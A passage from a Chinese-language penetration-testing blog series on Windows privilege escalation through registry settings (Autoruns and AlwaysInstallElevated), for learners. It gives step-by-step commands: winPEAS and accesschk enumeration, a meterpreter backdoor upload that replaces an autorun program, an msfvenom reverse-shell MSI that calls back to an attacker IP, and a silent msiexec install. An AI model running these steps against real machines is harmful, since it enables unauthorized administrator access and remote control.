iT邦幫忙

2021 iThome 鐵人賽

3
Security

資安這條路─系統化學習滲透測試系列 第 36

Day36 - Windows 提權(7)-提權手法統整 Registry 相關

資安這條路:領航新手的 Web Security 指南,以自建漏洞環境學習網站安全(iT邦幫忙鐵人賽系列書)終於出書了,大家有空可以參考看看我的作品,現在天瓏加入 Line 好友可以得到 100元折價券。

Registry

可以透過註冊表中設定開機後自動啟動的程式,並利用這些程式進行提權;或是如果註冊表中 AlwaysInstallElevated 值為 1 可以利用安裝 .msi 格式的安裝程式檔進行安裝,並透過當下常是安裝的使用者權限執行,透過 AlwaysInstallElevated 的設定可以允許一般使用者透過提升權限成 Admin 來安裝程式。

Autoruns

step1: 利用 winpeas 確認有問題的註冊表路徑
透過 winpeas winpeas.exe quiet applicationsinfo 可以在結果中找到 Autorun Application 發現可利用的開機自動啟動的程式路徑 Folder 以及檔案的權限 FilePerms 和註冊表的路徑 RegPath

step2:確認註冊表的內容
reg query 註冊表路徑

step3:可以透過 accesschk 確認執行檔案的權限
.\accesschk.exe /accepteula -wvu "檔案路徑"
如果發現 RW Everyone FILE_ALL_ACCESS 找到可以修改的程式

step4:上傳後門
meterpreter > upload "攻擊機惡意檔案路徑" "目標系統路徑"

step5:更換指定的路徑檔案
copy /Y 惡意程式路徑 "原檔案路徑"

step6:提權限制
自動啟動程式的權限,以最後一次登入者的權限,如果上一次登入為管理者權限,才可以提權。

AlwaysInstallElevated

SETP 1:需要滿足 AlwaysInstallElevated 需求
確認目標系統是否有設定註冊表 AlwaysInstallElevated 為 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

透過 winpeas winpeas.exe quiet windowscreds 可以在結果中找到 Checking AlwaysInstallElevater 發現 AlwaysInstallElevated 可以被利用。

兩個註冊表都需要啟動 AlwaysInstallElevated 才有效果,以針對 Active Directory 的使用者才會有該值,可透過 Group Policy Object (GPO) 進行設定。

step 2:構造後門
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.110.3 LPORT=53 -f msi -o reverse.msi

step 3:開啟監聽,並透過安裝軟體來提升權限
msiexec /quiet /qn /i C:\Temp\惡意檔案.msi


上一篇
Day35 - Windows 提權(6)-提權手法統整 Kernel Exploits vs Services Exploits
下一篇
Day37 - Windows 提權(8)-提權手法統整 Password 密碼相關
系列文
資安這條路─系統化學習滲透測試37

尚未有邦友留言

立即登入留言